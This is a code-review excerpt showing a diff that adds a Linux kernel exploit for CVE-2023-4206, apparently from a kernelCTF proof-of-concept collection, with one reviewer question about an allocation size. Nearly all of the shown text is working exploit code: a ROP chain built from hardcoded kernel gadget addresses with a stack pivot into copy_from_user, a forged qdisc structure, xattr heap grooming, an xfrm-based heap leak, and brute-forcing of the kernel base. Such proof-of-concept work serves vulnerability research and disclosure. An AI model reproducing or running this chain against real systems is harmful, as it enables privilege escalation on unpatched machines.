pocs/linux/kernelctf/CVE-2023-4206_lts_cos_mitigation_2/exploit/mitigation-6.1/exploit.c

```diff
@@ -0,0 +1,1010 @@
+// 0xffffffff81d5747e: push r14 ; jmp qword [rsi+0x66]
+        uint64_t g2 = kaddr(0xffffffff81d5747e);
+        uint64_t pop_rsp = kaddr(0xffffffff81404820);
+        uint64_t pop_r10_r9_r8_rdi_rsi_rdx_rcx = kaddr(0xffffffff810289a5);
+        uint64_t pop_rdi_rsi_rdx_rcx = kaddr(0xffffffff8106fb3b);
+
+        *(uint64_t *) (buf) = g1;
+
+// stab pointer (struct qdisc_size_table *stab) has to be null or __qdisc_calculate_pkt_len() (called from qdisc_calculate_pkt_len/__dev_xmit_skb) will crash trying to use it before enqueuing the packet
+        *(uint64_t *) (buf + 0x20) = 0;
+
+        *(uint64_t *) (buf + 0x28) = g2;
+        *(uint64_t *) (buf + 0x66) = pop_rsp;
+        uint64_t *rop = (uint64_t *) (buf+0x30);
+
+        char *rop2 = mmap(NULL, 0x4000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE|MAP_POPULATE|MAP_LOCKED, -1, 0);
+        if (rop2 == MAP_FAILED)
+                err(1, "mmap");
+
+        size_t rop2_len = prepare_rop2(rop2);
+
+// jump over 0x66
+        *rop++ = pop_r10_r9_r8_rdi_rsi_rdx_rcx;
+        rop += 7;
+
+        *rop++ = pop_rdi_rsi_rdx_rcx;
+        *rop++ = rw_buffer;
+        *rop++ = (uint64_t) rop2;
+        *rop++ = rop2_len;
+        *rop++ = 0;
+        *rop++ = copy_from_user;
+        *rop++ = pop_rsp;
+        *rop++ = rw_buffer;
+        *rop++ = ret;
+}
+
+int main(int argc, char **argv)
+{
+// Ignore kernel base provided in the command line to work around a repro system issue
+        if (0 && argc > 1 && (argv[1][0] == 'f' || argv[1][0] == '0')) {
+                g_kernel_text = strtoull(argv[1], NULL, 16);
+        } else {
+                printf("Using default kernel base, your chance is 1/512, good luck!\nTry providing leaked kernel base as argv[1]\n");
+
+                g_kernel_text = 0xffffffff81000000uL;
+        }
+
+        printf("Kernel base: 0x%lx\n", g_kernel_text);
+
+        setbuf(stdout, NULL);
+
+        setup_namespaces();
+
+        g_mmapped_buf = mmap(NULL, MMAP_SIZE, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE|MAP_POPULATE|MAP_LOCKED, -1, 0);
+        if (g_mmapped_buf == MAP_FAILED) {
+                perror("mmap");
+                return 1;
+        }
+
+        memset(g_mmapped_buf, 0, MMAP_SIZE);
+
+        set_cpu(0);
+
+        int xattr_fd = open("/tmp/xattr", O_CREAT|O_RDWR);
+
+        if (xattr_fd < 0)
+                err(1, "open xattr");
+
+#define XATTR_CNT 50
+        char *attr;
+        for (int i = 0; i < XATTR_CNT; i++)
+        {
+                asprintf(&attr, "security.%0240d", i);
+
+                alloc_xattr3(xattr_fd, attr, 96, g_mmapped_buf);
+        }
+
+        asprintf(&attr, "security.%0240d", XATTR_CNT-1);
+        free_xattr3(xattr_fd, attr);
+
+        xfrm_add_sa_pfkey_encrypt(2);
+        uint64_t heap_leak = xfrm_get_sa(2);
+        
+        printf("Heap leak: 0x%lx\n", heap_leak);
+
+        prepare_fake_qdisc(g_mmapped_buf+0x10);
+        
+        alloc_xattr3(xattr_fd, "security.new", 224, g_mmapped_buf);
```

Comment:
Why 224 and not 256? IIUC you subtracted `XATTR_HEAD_SIZE` (32) from `kmalloc-256`, but `alloc_xattr3` internally subtracts `XATTR_HEAD_SIZE`. Or is it intentional?